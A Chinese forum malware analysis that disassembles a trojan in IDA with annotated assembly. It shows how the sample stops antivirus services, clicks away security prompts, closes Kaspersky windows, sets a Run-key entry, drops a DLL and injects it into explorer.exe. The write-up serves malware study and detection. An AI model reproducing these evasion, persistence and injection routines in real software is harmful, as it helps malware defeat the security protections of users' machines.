【文章作者】: layper
【作者邮箱】: layper2002@yahoo.com.cn
【下载地址】: 自己搜索下载
【保护方式】: UPX
【使用工具】: IDA
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
太久没写破文了,手有点生了,拿个木马分析一下,呵呵,这是我第一次学习分析这些东西,老大们要指导指导才行.
从网上反病毒社区下了个11.exe到虚拟机,查壳是UPX,脱了后,就开始蛮干了,....
WinMain主过程分析
(一)判断是否已存在名为"15914244"的事件,有则挂起一段时间后结束,无则继续
; Fragment of WinMain (proc header not on this page): single-instance marker.
; A named event "15914244" is the "already running" marker. If OpenEventA finds
; it, control jumps to loc_40167C (not in this excerpt); otherwise the event is
; created, the process pauses 500 ms, and the handle is closed.
; Defender note: the event name is a host-based indicator for this sample.
mov esi, offset Name ; "15914244" - event name, reused by both calls below
xor ebx, ebx ; ebx = 0, used as the NULL/FALSE argument throughout WinMain
push esi ; lpName
push ebx ; bInheritHandle = FALSE
push 1F0003h ; dwDesiredAccess = EVENT_ALL_ACCESS
call OpenEventA ; open the existing named event, if any
test eax, eax ; non-zero = handle returned, i.e. the marker already exists
jnz loc_40167C ; another instance is running: take the path at loc_40167C (outside this excerpt)
push esi ; lpName
push ebx ; bInitialState = FALSE
push ebx ; bManualReset = FALSE
push ebx ; lpEventAttributes = NULL
call CreateEventA ; create the marker event; eax = handle
push 1F4h ; dwMilliseconds = 500
mov esi, eax ; keep the event handle across the Sleep call
call Sleep ; pause 500 ms
push esi ; hObject = event handle
call CloseHandle ; NOTE(review): closing the only handle shown here would let the
                 ; event disappear, so the guard may only cover this short window - confirm
(二)
(1)获取三个路径,11.exe文件所在路径、system32系统目录路径和windows目录路径,ExistingFileName是11.exe所在路径,
LibFileName保存system32目录路径,Data保存windows目录路径
; Fragment of WinMain (proc header not on this page): collect three paths.
; esi = 104h (MAX_PATH) is the buffer size for every call below; ebx = 0.
; szLongPath is a scratch buffer; each long path is converted to its short
; (8.3) form with GetShortPathNameA, whose address is cached in edi:
;   ExistingFileName <- this executable's own path (GetModuleFileNameA)
;   LibFileName      <- the system32 directory (GetSystemDirectoryA)
;   Data             <- the Windows directory (GetWindowsDirectoryA)
mov esi, 104h ; esi = MAX_PATH, reused as the size argument below
lea eax, [ebp+szLongPath]
push esi ; nSize
push eax ; lpFilename
push ebx ; hModule = NULL -> path of the current executable
mov [ebp+var_1], 1 ; flag set to 1; it is tested later in WinMain (cmp [ebp+var_1], bl)
call GetModuleFileNameA ; szLongPath = full path of this .exe
mov edi, GetShortPathNameA ; edi = &GetShortPathNameA, called three times below
lea eax, [ebp+ExistingFileName]
push esi ; cchBuffer
push eax ; lpszShortPath
lea eax, [ebp+szLongPath]
push eax ; lpszLongPath
call edi ; GetShortPathNameA: ExistingFileName = short form of "x:/xx/11.exe"
lea eax, [ebp+szLongPath]
push esi ; uSize
push eax ; lpBuffer
call GetSystemDirectoryA ; szLongPath = full path of the system32 directory
lea eax, [ebp+LibFileName]
push esi ; cchBuffer
push eax ; lpszShortPath
lea eax, [ebp+szLongPath]
push eax ; lpszLongPath
call edi ; GetShortPathNameA: LibFileName = short form of the system32 path
         ; (source is GetSystemDirectoryA above, not the Windows directory)
lea eax, [ebp+szLongPath]
push esi ; uSize
push eax ; lpBuffer
call GetWindowsDirectoryA ; szLongPath = full path of the Windows directory
lea eax, [ebp+Data]
push esi ; cchBuffer = size of the lpszShortPath buffer
; lpszShortPath receives the short path and file name
push eax ; lpszShortPath
lea eax, [ebp+szLongPath]
push eax ; lpszLongPath = name of the file whose short path is wanted
; (a full path, or resolved against the current directory)
call edi ; GetShortPathNameA: Data = short form of the Windows directory
(2)连接路径名
lea eax, [ebp+LibFileName]
push offset asc_403224 ; "//"
push eax ; unsigned __int8 *
call _mbscat
lea eax, [ebp+LibFileName]
push offset Avpsrv_dll ; 'AVPSrv.dll'
push eax ; unsigned __int8 *
call _mbscat
lea eax, [ebp+Data]
push offset asc_403224 ; "//"
push eax ; unsigned __int8 *
call _mbscat
lea eax, [ebp+Data]
push offset Avpsrv_exe ; 'AVPSrv.exe'
push eax ; unsigned __int8 *
call _mbscat
如果c盘为系统盘,LibFileName保存"c:/windows/system32//AVPSrv.dll",Data保存"c:/windows/AVPSrv.exe"
呵呵,看到这里就知道在哪找这些文件了.
(三)提高权限,建立优先执行的新线程执行StartAddress.
add esp, 20h
call Set_Privilege ; 设置当前进程令牌权限
push ebx ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset StartAddress ; lpStartAddress
push 400h ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; 建立线程
push 2 ; nPriority
push eax ; hThread
mov [ebp+hObject], eax
call SetThreadPriority ; 设定线程的优先级别
push 3E8h ; dwMilliseconds
push [ebp+hObject] ; hHandle
call WaitForSingleObject ; 等待单一对象直到对象有信号或超时
push [ebp+hObject] ; hObject
call CloseHandle
StartAddress主要是对RavMon窗口和一组服务(DefWatch、McShield等)进行操作
; DWORD __stdcall StartAddress(LPVOID)
; Thread entry point created from WinMain (CreateThread, priority 2).
; What is visible here:
;   1. decode three obfuscated strings in place (XOR 35h, jiema_int1addint2xor35);
;   2. call Service_Sun_Contronl once for each of eight service names (they
;      appear to be antivirus/firewall service names - McAfee, Norton, ...);
;   3. call SendToRavMon_PostMessageWMCOMMAND once;
;   4. poll forever: find windows by the decoded class/title, simulate a left
;      click on child windows whose caption starts with one of two 4-byte
;      constants, and post WM_CLOSE (10h) to two other windows.
; The loop at loc_401B9D has no exit; the thread runs until the process ends.
; Stack: 44h bytes of locals; ebx/esi/edi are saved in the prologue.
; Derived (not printed on the page): XOR 35h over the listed bytes, reading the
; page's "/" as a backslash and "/x1B" as byte 1Bh, gives
;   ClassName      = "AVP.AlertDialog"
;   s_TceEgzq@vajZa = "AVP.Product_Notification"
; i.e. Kaspersky (AVP) UI windows - confirm with a live decode.
StartAddress proc near ; DATA XREF: WinMain(x,x,x,x)+114o
String = byte ptr -44h ; window caption buffer (up to 1Fh chars read)
var_24 = dword ptr -24h ; table[0] of 8 service-name pointers (var_24..var_8)
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8 ; table[7]
hWnd = dword ptr -4 ; current child window handle
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
push edi
nop
nop
push 0Fh ; len = 15
push offset ClassName ; "tce/x1BtYPGAq//TYZR" (encoded; decoded in place)
call jiema_int1addint2xor35 ; buf[i] ^= 35h
push 18h ; len = 24
push offset s_TceEgzq@vajZa ; "tce/x1BeGZQ@VAj{ZA//S//VTA//Z[" (encoded)
call jiema_int1addint2xor35
push 12h ; len = 18
push offset WindowName ; "弪鈼囋勜壵婍/xFF? (encoded; bytes not recoverable from this page)
call jiema_int1addint2xor35
add esp, 18h ; cdecl: pop 3 calls x 2 args
mov [ebp+var_24], offset s_Defwatch ; "DefWatch" - table[0]
mov [ebp+var_20], offset s_Kwatchsvc ; "KWatchSvc"
mov [ebp+var_1C], offset s_Kpfwsvc ; "KPfwSvc"
push 8 ; loop count = 8 table entries (popped into edi below)
mov [ebp+var_18], offset s_Kvsrvxp ; "kvsrvxp"
mov [ebp+var_14], offset s_Mcafeeframewo ; "McAfeeFramework"
mov [ebp+var_10], offset s_Mcshield ; "McShield"
mov [ebp+var_C], offset s_Mctaskmanager ; "McTaskManager"
mov [ebp+var_8], offset s_NortonAntivir ; "Norton AntiVirus Server" - table[7]
lea esi, [ebp+var_24] ; esi = &table[0]
pop edi ; edi = 8
loc_401B7C: ; CODE XREF: StartAddress+7Cj
push dword ptr [esi] ; lpServiceName = table[i]
call Service_Sun_Contronl ; acts on the named service (body not on this page)
add esi, 4 ; next table entry
dec edi ; remaining count
pop ecx ; discard the pushed argument (cdecl cleanup; pop leaves flags alone)
jnz short loc_401B7C ; flags still from dec edi
call SendToRavMon_PostMessageWMCOMMAND ; post WM_COMMAND to RavMon (body not on this page)
mov ebx, FindWindowA ; ebx = &FindWindowA
mov esi, PostMessageA ; esi = &PostMessageA
xor edi, edi ; edi = 0: used as NULL and for the == 0 tests below
loc_401B9D: ; CODE XREF: StartAddress+113j
; StartAddress+120j
push 1 ; dwMilliseconds = 1
call Sleep ; tight polling loop, 1 ms per iteration
push edi ; lpWindowName = NULL
push offset ClassName ; lpClassName = decoded class name
call ebx ; FindWindowA
cmp eax, edi
jz short loc_401C02 ; no such window: skip the child-window walk
push 5 ; uCmd = GW_CHILD
push eax ; hWnd = the found top-level window
loc_401BB4: ; CODE XREF: StartAddress+F4j
call GetWindow ; eax = first child (GW_CHILD) on entry, next sibling
; (GW_HWNDNEXT) when re-entered from loc_401BFB;
; 0 when there are no more windows
cmp eax, edi
mov [ebp+hWnd], eax ; mov preserves the flags from cmp
jz short loc_401C02 ; no more children
lea eax, [ebp+String]
push 1Fh ; nMaxCount = 31
push eax ; lpString
push [ebp+hWnd] ; hWnd
call GetWindowTextA ; String = caption of the child window
cmp dword ptr [ebp+String], 0EDD0CAD4h ; first 4 caption bytes; little-endian D4 CA D0 ED
; looks like the GBK text "允许" (Allow) - confirm
jz short loc_401BE2
cmp dword ptr [ebp+String], 0FDB9F8CCh ; bytes CC F8 B9 FD, looks like GBK "跳过" (Skip) - confirm
jnz short loc_401BFB ; neither caption: move on to the next sibling
loc_401BE2: ; CODE XREF: StartAddress+CBj
push edi ; lParam = 0
push 1 ; wParam = MK_LBUTTON
push 201h ; Msg WM_LBUTTONDOWN
push [ebp+hWnd] ; hWnd
call esi ; PostMessageA - simulate a click on the matched button
push edi ; lParam
push edi ; wParam
push 202h ; Msg WM_LBUTTONUP
push [ebp+hWnd] ; hWnd
call esi ; PostMessageA
loc_401BFB: ; CODE XREF: StartAddress+D4j
push 2 ; uCmd = GW_HWNDNEXT
push [ebp+hWnd] ; hWnd = current child
jmp short loc_401BB4 ; continue with the next sibling
; ---------------------------------------------------------------------------
loc_401C02: ; CODE XREF: StartAddress+A3j
; StartAddress+B3j
push edi ; lpWindowName = NULL
push offset s_TceEgzq@vajZa ; lpClassName = second decoded class name
call ebx ; FindWindowA
cmp eax, edi
jz short loc_401C15
push edi ; lParam
push edi ; wParam
push 10h ; Msg = WM_CLOSE
push eax ; hWnd
call esi ; PostMessageA - ask the window to close
loc_401C15: ; CODE XREF: StartAddress+100j
push offset WindowName ; lpWindowName = decoded window title
push edi ; lpClassName = NULL
call ebx ; FindWindowA
cmp eax, edi
jz loc_401B9D ; not found: next polling iteration
push edi ; lParam
push edi ; wParam
push 10h ; Msg = WM_CLOSE
push eax ; hWnd
call esi ; PostMessageA - ask the window to close
jmp loc_401B9D ; loop forever
StartAddress endp
(四)复制文件11.exe到windows目录,并改名为AVPSrv.exe
lea eax, [ebp+Data] ;"c:/windows/AVPSrv.exe"
push ebx ; bFailIfExists
push eax ; lpNewFileName
lea eax, [ebp+ExistingFileName] ;"x:/xx/11.exe"
push eax ; lpExistingFileName
call CopyFileA ; 复制文件
test eax, eax
jnz short loc_40147D ; 成功跳走
(五)设置注册表把AVPSrv.exe设置为自动运行
loc_40147D: ; CODE XREF: WinMain(x,x,x,x)+187j
lea eax, [ebp+Data]
push eax ; lpData
push offset ValueName ; "AVPSrv"
call Reg_sub ;跟进
pop ecx
pop ecx
jmp short loc_401495
; int __cdecl Reg_sub(const char *lpValueName, const char *lpData)
; Persistence: writes a REG_SZ value under HKEY_LOCAL_MACHINE\<SubKey>.
; In (cdecl, the caller pops 8 bytes - see "pop ecx; pop ecx" at the call site):
;   [ebp+8]   lpValueName - "AVPSrv" at the call site
;   [ebp+0Ch] lpData      - the dropped AVPSrv.exe path
; Out: eax = RegOpenKeyExA result when the key cannot be opened (nothing is
;   written); otherwise the last call's return (RegCloseKey). Ignored by the caller.
; Locals: SubKey (84h bytes) holds the decoded key path.
; Derived (not printed on the page): XOR 35h over s_FzsabtgpixVgz, reading the
; page's "/" as a backslash, gives "SoftWare\Microsoft\Windows\CurrentVersion\Run",
; the standard HKLM Run key - confirm with a live decode.
Reg_sub proc near ; CODE XREF: WinMain(x,x,x,x)+206p
SubKey = byte ptr -84h ; decoded subkey path (2Eh bytes used, incl. NUL)
hKey = dword ptr -4 ; handle returned by RegOpenKeyExA
lpValueName = dword ptr 8
lpData = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
push 2Eh ; size_t n = 46 = 45 encoded bytes + terminating NUL
lea eax, [ebp+SubKey]
push offset s_FzsabtgpixVgz ; "fZSAbTGPix//VGZFZSAib//[QZBFiv@GGP[AcPGF//"... (encoded)
push eax ; void * dst = SubKey
call memcpy ; copy the encoded string to the stack so it can be decoded in place
lea eax, [ebp+SubKey]
push 2Dh ; len = 45; the trailing NUL is not touched
push eax ; buffer to decode
call jiema_int1addint2xor35 ; buf[i] ^= 35h
add esp, 14h ; cdecl: pop 5 args (3 for memcpy, 2 for the decoder)
lea eax, [ebp+hKey]
push eax ; phkResult: receives the opened key handle
push 0F003Fh ; samDesired = KEY_ALL_ACCESS
lea eax, [ebp+SubKey] ; decoded subkey path
push 0 ; ulOptions
push eax ; lpSubKey
push 80000002h ; hKey = HKEY_LOCAL_MACHINE
call RegOpenKeyExA ; open the existing key (it is not created if missing)
test eax, eax
jnz short locret_40179A ; ERROR_SUCCESS is 0; any other result: return without writing
push [ebp+lpData] ; char *
call strlen ; cbData = strlen(lpData). NOTE(review): the API expects the
; terminating NUL to be counted for REG_SZ; it is not here,
; so the stored value may come back without a terminator
pop ecx ; cdecl cleanup
push eax ; cbData
push [ebp+lpData] ; lpData = value data (the dropper path)
push 1 ; dwType = REG_SZ
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName ("AVPSrv")
push [ebp+hKey] ; hKey
call RegSetValueExA ; write the value
push [ebp+hKey] ; hKey
call RegCloseKey
locret_40179A: ; CODE XREF: Reg_sub+4Cj
leave
retn ; cdecl: the caller pops the two arguments
Reg_sub endp
这里把字符串简单加密后解码
s_FzsabtgpixVgz db 'fZSAbTGPix/VGZFZSAib/[QZBFiv@GGP[AcPGF/Z[ig`{',0
解码简单
; void __cdecl jiema_int1addint2xor35(unsigned char *buf, int len)
; In-place "decoder": XORs buf[0..len-1] with 35h. XOR with a constant is its
; own inverse, so the same routine encodes and decodes.
; Frameless; the arguments are addressed relative to esp:
;   arg_0 = buf (must be writable - globals such as ClassName, or SubKey on the stack)
;   arg_4 = len (signed compare; len <= 0 is a no-op)
; Clobbers: eax, ecx, flags. The caller removes the arguments (cdecl).
jiema_int1addint2xor35 proc near ; CODE XREF: Reg_sub+25p
; StartAddress+12p StartAddress+1Ep
; StartAddress+2Ap
arg_0 = dword ptr 4 ; buffer pointer
arg_4 = dword ptr 8 ; byte count
xor ecx, ecx ; i = 0
cmp [esp+arg_4], ecx
jle short locret_401C99 ; len <= 0: nothing to do
loc_401C89: ; CODE XREF: jiema_int1addint2xor35+16j
mov eax, [esp+arg_0]
add eax, ecx ; eax = &buf[i]
xor byte ptr [eax], 35h ; buf[i] ^= 35h, decoded in place
inc ecx ; i++
cmp ecx, [esp+arg_4]
jl short loc_401C89 ; while (i < len)
locret_401C99: ; CODE XREF: jiema_int1addint2xor35+6j
retn
jiema_int1addint2xor35 endp
呵呵,别怪我命名不规范,英文差,看懂就行,前面StartAddress也用到jiema_int1addint2xor35解码.
(六)读取资源,建立AVPSrv.dll,把资源代码写入AVPSrv.dll
push ebx ; lpModuleName
call GetModuleHandleA
push offset Type ; "DLL"
; 被提取资源的名称
push 65h ; lpName被提取资源的名称
push eax ; hModule被提取资源文件的句柄
mov [ebp+hObject], eax
call FindResourceA ; 寻找资源
push eax ; hResInfo返回资源句柄
mov [ebp+hLibModule], eax
push [ebp+hObject] ; hModule
call SizeofResource ; 资源大小
push [ebp+hLibModule] ; hResInfo
mov [ebp+NumberOfBytesWritten], eax
push [ebp+hObject] ; hModule
call LoadResource
push eax ; hResData
call LockResource ; 锁住资源
mov [ebp+lpBuffer], eax
lea eax, [ebp+LibFileName]
push eax ; lpFileName
call DeleteFileA ; 删除文件
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
lea eax, [ebp+LibFileName]
push 40000000h ; dwDesiredAccess
push eax ; lpFileName
call CreateFileA ; 建立或打开文件
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jnz loc_40158E
loc_40158E: ; CODE XREF: WinMain(x,x,x,x)+280j
lea eax, [ebp+NumberOfBytesWritten]
push ebx ; lpOverlapped
push eax ; lpNumberOfBytesWritten
push [ebp+NumberOfBytesWritten] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; 写入文件
push [ebp+hObject] ; hObject
mov edi, CloseHandle
call edi ; CloseHandle
push [ebp+hLibModule] ; hResData
call FreeResource
mov esi, Sleep ; 执行挂起一段时间
push 0C8h ; dwMilliseconds
call esi ; Sleep ; 执行挂起一段时间
(七)获取explorer.exe id,进行远程注入
push offset s_Explorer_exe ; "explorer.exe"
call SaveEax_explorerID_RavMonID ; Eax==explorerID
cmp eax, ebx
pop ecx
jz short loc_401617
cmp eax, ebx
pop ecx
jz short loc_401617
cmp [ebp+var_1], bl
jnz short loc_4015DD
mov [ebp+ExistingFileName], bl
loc_4015DD: ; CODE XREF: WinMain(x,x,x,x)+352j
push eax ; hModule
lea eax, [ebp+ExistingFileName]
push eax ; unsigned __int8 *
lea eax, [ebp+LibFileName]
push eax ; unsigned __int8 *
call sub_401074 ; 注入主函数,具体看附件
add esp, 0Ch
cmp eax, ebx
jz short loc_401617
push eax ; hObject
call edi ; CloseHandle
push 7D0h ; dwMilliseconds
call esi ; Sleep ; 执行挂起一段时间
cmp [ebp+var_C], ebx
jz short loc_401610
(八)释放,收工.
--------------------------------------------------------------------------------
【经验总结】
总算分析完了,之后才知道网上已经有人分析过了.
1提升权限.
2复制生成c:/windows/AVPSrv.exe,并释放c:/windows/system32/AVPSrv.dll.
3对瑞星窗口进行操作,关闭提示.
4把AVPSrv.DLL注入explorer.exe.
5设置AVPSrv.exe自动运行.
6简单算法象征性加密特殊字符串.
呵呵,比较简单.
--------------------------------------------------------------------------------
【版权声明】: 本文原创于看雪技术论坛, 转载请注明作者并保持文章的完整, 谢谢!
2007年07月23日 0:05:12